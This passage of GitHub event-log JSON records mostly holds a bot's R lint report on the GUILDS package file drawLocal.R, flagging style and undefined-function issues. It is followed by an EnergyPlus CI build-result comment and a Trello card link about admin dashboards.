around all infix operators.**\n```r\n​\tk2 <- 1:(j - 1)  \n          ~^\n```\n[R/drawLocal.R:46:17:](https://github.com/thijsjanzen/GUILDS/blob/1be679740e539c06d54fc37985a9dc1a3481778c/R/drawLocal.R#L46) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\tk2 <- 1:(j - 1)  \n                ^\n```\n[R/drawLocal.R:46:17:](https://github.com/thijsjanzen/GUILDS/blob/1be679740e539c06d54fc37985a9dc1a3481778c/R/drawLocal.R#L46) *style:* **Trailing whitespace is superfluous.**\n```r\n​\tk2 <- 1:(j - 1)  \n                ^~\n```\n[R/drawLocal.R:47:1:](https://github.com/thijsjanzen/GUILDS/blob/1be679740e539c06d54fc37985a9dc1a3481778c/R/drawLocal.R#L47) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tkesk <- interp1(x = log2(k1), y = k1 * res, xi = log2(k2), method = \"spline\")\n^\n```\n[R/drawLocal.R:47:10:](https://github.com/thijsjanzen/GUILDS/blob/1be679740e539c06d54fc37985a9dc1a3481778c/R/drawLocal.R#L47) *warning:* **no visible global function definition for ‘interp1’**\n```r\n​\tkesk <- interp1(x = log2(k1), y = k1 * res, xi = log2(k2), method = \"spline\")\n         ^~~~~~~\n```\n[R/drawLocal.R:47:14:](https://github.com/thijsjanzen/GUILDS/blob/1be679740e539c06d54fc37985a9dc1a3481778c/R/drawLocal.R#L47) *style:* **Put spaces around all infix operators.**\n```r\n​\tkesk <- interp1(x = log2(k1), y = k1 * res, xi = log2(k2), method = \"spline\")\n            ~^~~\n```\n[R/drawLocal.R:47:27:](https://github.com/thijsjanzen/GUILDS/blob/1be679740e539c06d54fc37985a9dc1a3481778c/R/drawLocal.R#L47) *style:* **Put spaces around all infix operators.**\n```r\n​\tkesk <- interp1(x = log2(k1), y = k1 * res, xi = log2(k2), method = \"spline\")\n                         ~^~\n```\n[R/drawLocal.R:47:41:](https://github.com/thijsjanzen/GUILDS/blob/1be679740e539c06d54fc37985a9dc1a3481778c/R/drawLocal.R#L47) *style:* **Put spaces around all infix operators.**\n```r\n​\tkesk <- interp1(x = log2(k1), y = k1 * res, xi = log2(k2), method = \"spline\")\n                                        ^~\n```\n[R/drawLocal.R:47:46:](https://github.com/thijsjanzen/GUILDS/blob/1be679740e539c06d54fc37985a9dc1a3481778c/R/drawLocal.R#L47) *style:* **Put spaces around all infix operators.**\n```r\n​\tkesk <- interp1(x = log2(k1), y = k1 * res, xi = log2(k2), method = \"spline\")\n                                             ^~\n```\n[R/drawLocal.R:47:56:](https://github.com/thijsjanzen/GUILDS/blob/1be679740e539c06d54fc37985a9dc1a3481778c/R/drawLocal.R#L47) *style:* **Put spaces around all infix operators.**\n```r\n​\tkesk <- interp1(x = log2(k1), y = k1 * res, xi = log2(k2), method = \"spline\")\n                                                      ~^~\n```\n[R/drawLocal.R:47:75:](https://github.com/thijsjanzen/GUILDS/blob/1be679740e539c06d54fc37985a9dc1a3481778c/R/drawLocal.R#L47) *style:* **Put spaces around all infix operators.**\n```r\n​\tkesk <- interp1(x = log2(k1), y = k1 * res, xi = log2(k2), method = \"spline\")\n                                                                         ~^~\n```\n[R/drawLocal.R:48:1:](https://github.com/thijsjanzen/GUILDS/blob/1be679740e539c06d54fc37985a9dc1a3481778c/R/drawLocal.R#L48) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tk2 <- c(k2, j)\n^\n```\n[R/drawLocal.R:48:12:](https://github.com/thijsjanzen/GUILDS/blob/1be679740e539c06d54fc37985a9dc1a3481778c/R/drawLocal.R#L48) *style:* **Put spaces around all infix operators.**\n```r\n​\tk2 <- c(k2, j)\n          ~^~~\n```\n[R/drawLocal.R:49:1:](https://github.com/thijsjanzen/GUILDS/blob/1be679740e539c06d54fc37985a9dc1a3481778c/R/drawLocal.R#L49) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tkesk <- c(kesk, 0)\n^\n```\n[R/drawLocal.R:49:14:](https://github.com/thijsjanzen/GUILDS/blob/1be679740e539c06d54fc37985a9dc1a3481778c/R/drawLocal.R#L49) *style:* **Put spaces around all infix operators.**\n```r\n​\tkesk <- c(kesk, 0)\n            ~^~~\n```\n[R/drawLocal.R:50:1:](https://github.com/thijsjanzen/GUILDS/blob/1be679740e539c06d54fc37985a9dc1a3481778c/R/drawLocal.R#L50) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tesk <- kesk / k2\n^\n```\n[R/drawLocal.R:50:13:](https://github.com/thijsjanzen/GUILDS/blob/1be679740e539c06d54fc37985a9dc1a3481778c/R/drawLocal.R#L50) *style:* **Put spaces around all infix operators.**\n```r\n​\tesk <- kesk / k2\n           ~^\n```\n[R/drawLocal.R:51:1:](https://github.com/thijsjanzen/GUILDS/blob/1be679740e539c06d54fc37985a9dc1a3481778c/R/drawLocal.R#L51) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tesk[esk < eps()] <- eps()\n^\n```\n[R/drawLocal.R:51:12:](https://github.com/thijsjanzen/GUILDS/blob/1be679740e539c06d54fc37985a9dc1a3481778c/R/drawLocal.R#L51) *warning:* **no visible global function definition for ‘eps’, Did you mean 'esk'?**\n```r\n​\tesk[esk < eps()] <- eps()\n           ^~~\n```\n[R/drawLocal.R:51:12:](https://github.com/thijsjanzen/GUILDS/blob/1be679740e539c06d54fc37985a9dc1a3481778c/R/drawLocal.R#L51) *warning:* **no visible global function definition for ‘eps’, Did you mean 'esk'?**\n```r\n​\tesk[esk < eps()] <- eps()\n           ^~~\n```\n[R/drawLocal.R:51:17:](https://github.com/thijsjanzen/GUILDS/blob/1be679740e539c06d54fc37985a9dc1a3481778c/R/drawLocal.R#L51) *style:* **Put spaces around all infix operators.**\n```r\n​\tesk[esk < eps()] <- eps()\n               ~^\n```\n[R/drawLocal.R:51:26:](https://github.com/thijsjanzen/GUILDS/blob/1be679740e539c06d54fc37985a9dc1a3481778c/R/drawLocal.R#L51) *style:* **Put spaces around all infix operators.**\n```r\n​\tesk[esk < eps()] <- eps()\n                        ~^~~\n```\n[R/drawLocal.R:52:1:](https://github.com/thijsjanzen/GUILDS/blob/1be679740e539c06d54fc37985a9dc1a3481778c/R/drawLocal.R#L52) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\treturn(esk)\n^\n```\n[R/drawLocal.R:56:11:](https://github.com/thijsjanzen/GUILDS/blob/1be679740e539c06d54fc37985a9dc1a3481778c/R/drawLocal.R#L56) *style:* **Use <-, not =, for assignment.**\n```r\n​\ty = rep(0, length(x))\n          ^\n```\n[R/drawLocal.R:56:11:](https://github.com/thijsjanzen/GUILDS/blob/1be679740e539c06d54fc37985a9dc1a3481778c/R/drawLocal.R#L56) *style:* **Put spaces around all infix operators.**\n```r\n​\ty = rep(0, length(x))\n         ~^\n```\n[R/drawLocal.R:57:14:](https://github.com/thijsjanzen/GUILDS/blob/1be679740e539c06d54fc37985a9dc1a3481778c/R/drawLocal.R#L57) *style:* **Use <-, not =, for assignment.**\n```r\n​\tidx0 = which( x == 0 )\n             ^\n```\n[R/drawLocal.R:57:14:](https://github.com/thijsjanzen/GUILDS/blob/1be679740e539c06d54fc37985a9dc1a3481778c/R/drawLocal.R#L57) *style:* **Put spaces around all infix operators.**\n```r\n​\tidx0 = which( x == 0 )\n            ~^\n```\n[R/drawLocal.R:58:11:](https://github.com/thijsjanzen/GUILDS/blob/1be679740e539c06d54fc37985a9dc1a3481778c/R/drawLocal.R#L58) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\tif(length(idx0) > 0) {\n          ^\n```\n[R/drawLocal.R:59:21:](https://github.com/thijsjanzen/GUILDS/blob/1be679740e539c06d54fc37985a9dc1a3481778c/R/drawLocal.R#L59) *style:* **Use <-, not =, for assignment.**\n```r\n​\t\taux = log(th) + lgamma(I) - lgamma(I+j) +\n                    ^\n```\n[R/drawLocal.R:59:21:](https://github.com/thijsjanzen/GUILDS/blob/1be679740e539c06d54fc37985a9dc1a3481778c/R/drawLocal.R#L59) *style:* **Put spaces around all infix operators.**\n```r\n​\t\taux = log(th) + lgamma(I) - lgamma(I+j) +\n                   ~^~\n```\n[R/drawLocal.R:59:31:](https://github.com/thijsjanzen/GUILDS/blob/1be679740e539c06d54fc37985a9dc1a3481778c/R/drawLocal.R#L59) *style:* **Put spaces around all infix operators.**\n```r\n​\t\taux = log(th) + lgamma(I) - lgamma(I+j) +\n                              ^~\n```\n[R/drawLocal.R:60:35:](https://github.com/thijsjanzen/GUILDS/blob/1be679740e539c06d54fc37985a9dc1a3481778c/R/drawLocal.R#L60) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t\t  lgamma(j+1) - lgamma(k+1) - lgamma(j-k+1) +\n                                 ~^~\n```\n[R/drawLocal.R:60:39:](https://github.com/thijsjanzen/GUILDS/blob/1be679740e539c06d54fc37985a9dc1a3481778c/R/drawLocal.R#L60) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t\t  lgamma(j+1) - lgamma(k+1) - lgamma(j-k+1) +\n                                     ~^~\n```\n[R/drawLocal.R:60:49:](https://github.com/thijsjanzen/GUILDS/blob/1be679740e539c06d54fc37985a9dc1a3481778c/R/drawLocal.R#L60) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t\t  lgamma(j+1) - lgamma(k+1) - lgamma(j-k+1) +\n                                               ~^~\n```\n[R/drawLocal.R:61:37:](https://github.com/thijsjanzen/GUILDS/blob/1be679740e539c06d54fc37985a9dc1a3481778c/R/drawLocal.R#L61) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t\t  lgamma(k) +   lgamma(I+j-k) - lgamma(I) + log(I)\n                                   ~^~\n```\n[R/drawLocal.R:61:49:](https://github.com/thijsjanzen/GUILDS/blob/1be679740e539c06d54fc37985a9dc1a3481778c/R/drawLocal.R#L61) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t\t  lgamma(k) +   lgamma(I+j-k) - lgamma(I) + log(I)\n                                               ~^~\n```\n[R/drawLocal.R:61:51:](https://github.com/thijsjanzen/GUILDS/blob/1be679740e539c06d54fc37985a9dc1a3481778c/R/drawLocal.R#L61) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t\t  lgamma(k) +   lgamma(I+j-k) - lgamma(I) + log(I)\n                                                 ~^~\n```\n[R/drawLocal.R:62:25:](https://github.com/thijsjanzen/GUILDS/blob/1be679740e539c06d54fc37985a9dc1a3481778c/R/drawLocal.R#L62) *style:* **Use <-, not =, for assignment.**\n```r\n​\t\ty[idx0] = aux\n                        ^\n```\n[R/drawLocal.R:64:14:](https://github.com/thijsjanzen/GUILDS/blob/1be679740e539c06d54fc37985a9dc1a3481778c/R/drawLocal.R#L64) *style:* **Use <-, not =, for assignment.**\n```r\n​\tidx1 = which(x == 1)\n             ^\n```\n[R/drawLocal.R:64:14:](https://github.com/thijsjanzen/GUILDS/blob/1be679740e539c06d54fc37985a9dc1a3481778c/R/drawLocal.R#L64) *style:* **Put spaces around all infix operators.**\n```r\n​\tidx1 = which(x == 1)\n            ~^~\n```\n[R/drawLocal.R:65:12:](https://github.com/thijsjanzen/GUILDS/blob/1be679740e539c06d54fc37985a9dc1a3481778c/R/drawLocal.R#L65) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\tif (length(idx1) > 0) {\n           ^\n```\n[R/drawLocal.R:66:22:](https://github.com/thijsjanzen/GUILDS/blob/1be679740e539c06d54fc37985a9dc1a3481778c/R/drawLocal.R#L66) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\t\t  if ((k<j)||((k == j) && (th > 1))) {\n                     ^\n```\n[R/drawLocal.R:66:25:](https://github.com/thijsjanzen/GUILDS/blob/1be679740e539c06d54fc37985a9dc1a3481778c/R/drawLocal.R#L66) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t  if ((k<j)||((k == j) && (th > 1))) {\n                       ~^~\n```\n[R/drawLocal.R:66:28:](https://github.com/thijsjanzen/GUILDS/blob/1be679740e539c06d54fc37985a9dc1a3481778c/R/drawLocal.R#L66) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t  if ((k<j)||((k == j) && (th > 1))) {\n                          ~^~~\n```\n[R/drawLocal.R:66:30:](https://github.com/thijsjanzen/GUILDS/blob/1be679740e539c06d54fc37985a9dc1a3481778c/R/drawLocal.R#L66) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\t\t  if ((k<j)||((k == j) && (th > 1))) {\n                             ^\n```\n[R/drawLocal.R:66:31:](https://github.com/thijsjanzen/GUILDS/blob/1be679740e539c06d54fc37985a9dc1a3481778c/R/drawLocal.R#L66) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\t\t  if ((k<j)||((k == j) && (th > 1))) {\n                              ^\n```\n[R/drawLocal.R:66:34:](https://github.com/thijsjanzen/GUILDS/blob/1be679740e539c06d54fc37985a9dc1a3481778c/R/drawLocal.R#L66) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t  if ((k<j)||((k == j) && (th > 1))) {\n                                ~^~~\n```\n[R/drawLocal.R:66:40:](https://github.com/thijsjanzen/GUILDS/blob/1be679740e539c06d54fc37985a9dc1a3481778c/R/drawLocal.R#L66) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t  if ((k<j)||((k == j) && (th > 1))) {\n                                       ^~~\n```\n[R/drawLocal.R:67:35:](https://github.com/thijsjanzen/GUILDS/blob/1be679740e539c06d54fc37985a9dc1a3481778c/R/drawLocal.R#L67) *style:* **Use <-, not =, for assignment.**\n```r\n​\t\t\t  y[idx1] = -Inf\n                                  ^\n```\n[R/drawLocal.R:68:29:](https://github.com/thijsjanzen/GUILDS/blob/1be679740e539c06d54fc37985a9dc1a3481778c/R/drawLocal.R#L68) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\t\t  } else if ((k == j) && (th == 1)) {\n                            ^\n```\n[R/drawLocal.R:68:30:](https://github.com/thijsjanzen/GUILDS/blob/1be679740e539c06d54fc37985a9dc1a3481778c/R/drawLocal.R#L68) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\t\t  } else if ((k == j) && (th == 1)) {\n                             ^\n```\n[R/drawLocal.R:68:33:](https://github.com/thijsjanzen/GUILDS/blob/1be679740e539c06d54fc37985a9dc1a3481778c/R/drawLocal.R#L68) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t  } else if ((k == j) && (th == 1)) {\n                               ~^~~\n```\n[R/drawLocal.R:68:39:](https://github.com/thijsjanzen/GUILDS/blob/1be679740e539c06d54fc37985a9dc1a3481778c/R/drawLocal.R#L68) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t  } else if ((k == j) && (th == 1)) {\n                                      ^~~\n```\n[R/drawLocal.R:69:31:](https://github.com/thijsjanzen/GUILDS/blob/1be679740e539c06d54fc37985a9dc1a3481778c/R/drawLocal.R#L69) *style:* **Use <-, not =, for assignment.**\n```r\n​\t\t      y[idx1] = 0\n                              ^\n```\n[R/drawLocal.R:70:29:](https://github.com/thijsjanzen/GUILDS/blob/1be679740e539c06d54fc37985a9dc1a3481778c/R/drawLocal.R#L70) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\t\t  } else if ((k == j) && (th < 1)) {\n                            ^\n```\n[R/drawLocal.R:70:30:](https://github.com/thijsjanzen/GUILDS/blob/1be679740e539c06d54fc37985a9dc1a3481778c/R/drawLocal.R#L70) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\t\t  } else if ((k == j) && (th < 1)) {\n                             ^\n```\n[R/drawLocal.R:70:33:](https://github.com/thijsjanzen/GUILDS/blob/1be679740e539c06d54fc37985a9dc1a3481778c/R/drawLocal.R#L70) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t  } else if ((k == j) && (th < 1)) {\n                               ~^~~\n```\n[R/drawLocal.R:70:39:](https://github.com/thijsjanzen/GUILDS/blob/1be679740e539c06d54fc37985a9dc1a3481778c/R/drawLocal.R#L70) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t  } else if ((k == j) && (th < 1)) {\n                                     ~^~~\n```\n[R/drawLocal.R:71:35:](https://github.com/thijsjanzen/GUILDS/blob/1be679740e539c06d54fc37985a9dc1a3481778c/R/drawLocal.R#L71) *style:* **Use <-, not =, for assignment.**\n```r\n​\t\t\t  y[idx1] = Inf\n                                  ^\n```\n[R/drawLocal.R:74:14:](https://github.com/thijsjanzen/GUILDS/blob/1be679740e539c06d54fc37985a9dc1a3481778c/R/drawLocal.R#L74) *style:* **Use <-, not =, for assignment.**\n```r\n​\tidxp = which((x > 0) & (x < 1))\n             ^\n```\n[R/drawLocal.R:74:14:](https://github.com/thijsjanzen/GUILDS/blob/1be679740e539c06d54fc37985a9dc1a3481778c/R/drawLocal.R#L74) *style:* **Put spaces around all infix operators.**\n```r\n​\tidxp = which((x > 0) & (x < 1))\n            ~^~\n```\n[R/drawLocal.R:74:22:](https://github.com/thijsjanzen/GUILDS/blob/1be679740e539c06d54fc37985a9dc1a3481778c/R/drawLocal.R#L74) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\tidxp = which((x > 0) & (x < 1))\n                     ^\n```\n[R/drawLocal.R:74:25:](https://github.com/thijsjanzen/GUILDS/blob/1be679740e539c06d54fc37985a9dc1a3481778c/R/drawLocal.R#L74) *style:* **Put spaces around all infix operators.**\n```r\n​\tidxp = which((x > 0) & (x < 1))\n                        ^~\n```\n[R/drawLocal.R:74:30:](https://github.com/thijsjanzen/GUILDS/blob/1be679740e539c06d54fc37985a9dc1a3481778c/R/drawLocal.R#L74) *style:* **Put spaces around all infix operators.**\n```r\n​\tidxp = which((x > 0) & (x < 1))\n                             ^~\n```\n[R/drawLocal.R:74:32:](https://github.com/thijsjanzen/GUILDS/blob/1be679740e539c06d54fc37985a9dc1a3481778c/R/drawLocal.R#L74) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\tidxp = which((x > 0) & (x < 1))\n                               ^\n```\n[R/drawLocal.R:75:12:](https://github.com/thijsjanzen/GUILDS/blob/1be679740e539c06d54fc37985a9dc1a3481778c/R/drawLocal.R#L75) *style:* **Use <-, not =, for assignment.**\n```r\n​\txx = x[idxp]\n           ^\n```\n[R/drawLocal.R:75:12:](https://github.com/thijsjanzen/GUILDS/blob/1be679740e539c06d54fc37985a9dc1a3481778c/R/drawLocal.R#L75) *style:* **Put spaces around all infix operators.**\n```r\n​\txx = x[idxp]\n          ~^~\n```\n[R/drawLocal.R:76:13:](https://github.com/thijsjanzen/GUILDS/blob/1be679740e539c06d54fc37985a9dc1a3481778c/R/drawLocal.R#L76) *style:* **Use <-, not =, for assignment.**\n```r\n​\taux = log(th) + lgamma(I)-lgamma(I+j) +\n            ^\n```\n[R/drawLocal.R:76:13:](https://github.com/thijsjanzen/GUILDS/blob/1be679740e539c06d54fc37985a9dc1a3481778c/R/drawLocal.R#L76) *style:* **Put spaces around all infix operators.**\n```r\n​\taux = log(th) + lgamma(I)-lgamma(I+j) +\n           ~^~\n```\n[R/drawLocal.R:76:23:](https://github.com/thijsjanzen/GUILDS/blob/1be679740e539c06d54fc37985a9dc1a3481778c/R/drawLocal.R#L76) *style:* **Put spaces around all infix operators.**\n```r\n​\taux = log(th) + lgamma(I)-lgamma(I+j) +\n                     ~^~\n```\n[R/drawLocal.R:76:34:](https://github.com/thijsjanzen/GUILDS/blob/1be679740e539c06d54fc37985a9dc1a3481778c/R/drawLocal.R#L76) *style:* **Put spaces around all infix operators.**\n```r\n​\taux = log(th) + lgamma(I)-lgamma(I+j) +\n                                ~^~\n```\n[R/drawLocal.R:77:27:](https://github.com/thijsjanzen/GUILDS/blob/1be679740e539c06d54fc37985a9dc1a3481778c/R/drawLocal.R#L77) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t  lgamma(j+1) - lgamma(k+1) - lgamma(j-k+1) +\n                         ~^~\n```\n[R/drawLocal.R:77:41:](https://github.com/thijsjanzen/GUILDS/blob/1be679740e539c06d54fc37985a9dc1a3481778c/R/drawLocal.R#L77) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t  lgamma(j+1) - lgamma(k+1) - lgamma(j-k+1) +\n                                       ~^~\n```\n[R/drawLocal.R:77:45:](https://github.com/thijsjanzen/GUILDS/blob/1be679740e539c06d54fc37985a9dc1a3481778c/R/drawLocal.R#L77) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t  lgamma(j+1) - lgamma(k+1) - lgamma(j-k+1) +\n                                           ~^\n```\n[R/drawLocal.R:78:28:](https://github.com/thijsjanzen/GUILDS/blob/1be679740e539c06d54fc37985a9dc1a3481778c/R/drawLocal.R#L78) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t  lgamma(I * xx + k) - lgamma(I * xx) +\n                          ~^~\n```\n[R/drawLocal.R:78:33:](https://github.com/thijsjanzen/GUILDS/blob/1be679740e539c06d54fc37985a9dc1a3481778c/R/drawLocal.R#L78) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t  lgamma(I * xx + k) - lgamma(I * xx) +\n                               ~^\n```\n[R/drawLocal.R:78:38:](https://github.com/thijsjanzen/GUILDS/blob/1be679740e539c06d54fc37985a9dc1a3481778c/R/drawLocal.R#L78) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t  lgamma(I * xx + k) - lgamma(I * xx) +\n                                    ~^~\n```\n[R/drawLocal.R:79:28:](https://github.com/thijsjanzen/GUILDS/blob/1be679740e539c06d54fc37985a9dc1a3481778c/R/drawLocal.R#L79) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t  lgamma(I * (1 - xx) + j - k) - lgamma(I * (1 - xx)) +\n                          ~^~\n```\n[R/drawLocal.R:79:30:](https://github.com/thijsjanzen/GUILDS/blob/1be679740e539c06d54fc37985a9dc1a3481778c/R/drawLocal.R#L79) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\t\t  lgamma(I * (1 - xx) + j - k) - lgamma(I * (1 - xx)) +\n                             ^\n```\n[R/drawLocal.R:79:33:](https://github.com/thijsjanzen/GUILDS/blob/1be679740e539c06d54fc37985a9dc1a3481778c/R/drawLocal.R#L79) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t  lgamma(I * (1 - xx) + j - k) - lgamma(I * (1 - xx)) +\n                               ~^~\n```\n[R/drawLocal.R:79:39:](https://github.com/thijsjanzen/GUILDS/blob/1be679740e539c06d54fc37985a9dc1a3481778c/R/drawLocal.R#L79) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t  lgamma(I * (1 - xx) + j - k) - lgamma(I * (1 - xx)) +\n                                     ~^~\n```\n[R/drawLocal.R:79:43:](https://github.com/thijsjanzen/GUILDS/blob/1be679740e539c06d54fc37985a9dc1a3481778c/R/drawLocal.R#L79) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t  lgamma(I * (1 - xx) + j - k) - lgamma(I * (1 - xx)) +\n                                         ~^\n```\n[R/drawLocal.R:79:48:](https://github.com/thijsjanzen/GUILDS/blob/1be679740e539c06d54fc37985a9dc1a3481778c/R/drawLocal.R#L79) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t  lgamma(I * (1 - xx) + j - k) - lgamma(I * (1 - xx)) +\n                                              ~^\n```\n[R/drawLocal.R:80:19:](https://github.com/thijsjanzen/GUILDS/blob/1be679740e539c06d54fc37985a9dc1a3481778c/R/drawLocal.R#L80) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\t\t  (th-1) * log(1 - xx) - log(xx)\n                  ^\n```\n[R/drawLocal.R:80:22:](https://github.com/thijsjanzen/GUILDS/blob/1be679740e539c06d54fc37985a9dc1a3481778c/R/drawLocal.R#L80) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t  (th-1) * log(1 - xx) - log(xx)\n                     ^~\n```\n[R/drawLocal.R:80:34:](https://github.com/thijsjanzen/GUILDS/blob/1be679740e539c06d54fc37985a9dc1a3481778c/R/drawLocal.R#L80) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t  (th-1) * log(1 - xx) - log(xx)\n                                ~^~\n```\n[R/drawLocal.R:81:17:](https://github.com/thijsjanzen/GUILDS/blob/1be679740e539c06d54fc37985a9dc1a3481778c/R/drawLocal.R#L81) *style:* **Use <-, not =, for assignment.**\n```r\n​\ty[idxp] = aux\n                ^\n```\n[R/drawLocal.R:85:1:](https://github.com/thijsjanzen/GUILDS/blob/1be679740e539c06d54fc37985a9dc1a3481778c/R/drawLocal.R#L85) *style:* **Variable and function names should be all lowercase.**\n```r\n​drawLocalCond <- function(theta, alpha_x, alpha_y, JX, JY) {\n^~~~~~~~~~~~~\n```\n[R/drawLocal.R:87:5:](https://github.com/thijsjanzen/GUILDS/blob/1be679740e539c06d54fc37985a9dc1a3481778c/R/drawLocal.R#L87) *style:* **Use <-, not =, for assignment.**\n```r\n​  J = JX + JY\n    ^\n```\n[R/drawLocal.R:91:6:](https://github.com/thijsjanzen/GUILDS/blob/1be679740e539c06d54fc37985a9dc1a3481778c/R/drawLocal.R#L91) *style:* **Use <-, not =, for assignment.**\n```r\n​  nx = getPX(theta, alpha_x, alpha_y, JX, JY)\n     ^\n```\n[R/drawLocal.R:91:8:](https://github.com/thijsjanzen/GUILDS/blob/1be679740e539c06d54fc37985a9dc1a3481778c/R/drawLocal.R#L91) *style:* **Variable and function names should be all lowercase.**\n```r\n​  nx = getPX(theta, alpha_x, alpha_y, JX, JY)\n       ^~~~~\n```\n[R/drawLocal.R:91:8:](https://github.com/thijsjanzen/GUILDS/blob/1be679740e539c06d54fc37985a9dc1a3481778c/R/drawLocal.R#L91) *warning:* **no visible global function definition for ‘getPX’, Did you mean 'setPS'?**\n```r\n​  nx = getPX(theta, alpha_x, alpha_y, JX, JY)\n       ^~~~~\n```\n[R/drawLocal.R:92:6:](https://github.com/thijsjanzen/GUILDS/blob/1be679740e539c06d54fc37985a9dc1a3481778c/R/drawLocal.R#L92) *style:* **Use <-, not =, for assignment.**\n```r\n​  ny = 1 - nx;\n     ^\n```\n[R/drawLocal.R:95:7:](https://github.com/thijsjanzen/GUILDS/blob/1be679740e539c06d54fc37985a9dc1a3481778c/R/drawLocal.R#L95) *style:* **Use <-, not =, for assignment.**\n```r\n​  I_X = alpha_x * nx * (J-1) / (1 - alpha_x * nx - alpha_y * ny)\n      ^\n```\n[R/drawLocal.R:95:26:](https://github.com/thijsjanzen/GUILDS/blob/1be679740e539c06d54fc37985a9dc1a3481778c/R/drawLocal.R#L95) *style:* **Put spaces around all infix operators.**\n```r\n​  I_X = alpha_x * nx * (J-1) / (1 - alpha_x * nx - alpha_y * ny)\n                        ~^~\n```\n[R/drawLocal.R:96:7:](https://github.com/thijsjanzen/GUILDS/blob/1be679740e539c06d54fc37985a9dc1a3481778c/R/drawLocal.R#L96) *style:* **Use <-, not =, for assignment.**\n```r\n​  I_Y = alpha_y * ny * (J-1) / (1 - alpha_x * nx - alpha_y * ny)\n      ^\n```\n[R/drawLocal.R:96:26:](https://github.com/thijsjanzen/GUILDS/blob/1be679740e539c06d54fc37985a9dc1a3481778c/R/drawLocal.R#L96) *style:* **Put spaces around all infix operators.**\n```r\n​  I_Y = alpha_y * ny * (J-1) / (1 - alpha_x * nx - alpha_y * ny)\n                        ~^~\n```\n[R/drawLocal.R:98:8:](https://github.com/thijsjanzen/GUILDS/blob/1be679740e539c06d54fc37985a9dc1a3481778c/R/drawLocal.R#L98) *style:* **Use <-, not =, for assignment.**\n```r\n​  SADX = pm_sad(theta, I_X, JX)\n"}},"created_at":"2016-09-22T14:22:15Z"}
{"id":"4602767840","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19131044,"position":null,"line":null,"path":null,"commit_id":"a601645c36749607ff70b449cc9fa452448f7dab","created_at":"2016-09-22T14:22:47Z","updated_at":"2016-09-22T14:22:47Z","body":"Sizing-Simple-Chilled-Ceiling (RKStrand) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug: OK (1767 of 1767 tests passed, 1 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-a601645c36749607ff70b449cc9fa452448f7dab-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-a601645c36749607ff70b449cc9fa452448f7dab-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-a601645c36749607ff70b449cc9fa452448f7dab-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-71.14%25-green.svg)</a>\n"}},"created_at":"2016-09-22T14:22:47Z"}
{"id":"4602769881","type":"CommitCommentEvent","actor":{"login":"ruddy12"},"repo":{"name":"UXT-team/site"},"payload":{"comment":{"id":19131050,"position":null,"line":null,"path":null,"commit_id":"c896361f9c6d4043fc2dcaf1219f1cad80e27b87","created_at":"2016-09-22T14:23:07Z","updated_at":"2016-09-22T14:23:07Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;ogNLKl5w&#x2F;25-as-the-product-owner-i-want-create-two-dashboards-one-for-admin-artiste-to-upload-another-for-super-admin\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> As the Product owner I want Create two dashboards- One for admin[artiste to upload] another for Super admin</a>"}},"created_at":"2016-09-22T14:23:07Z"}
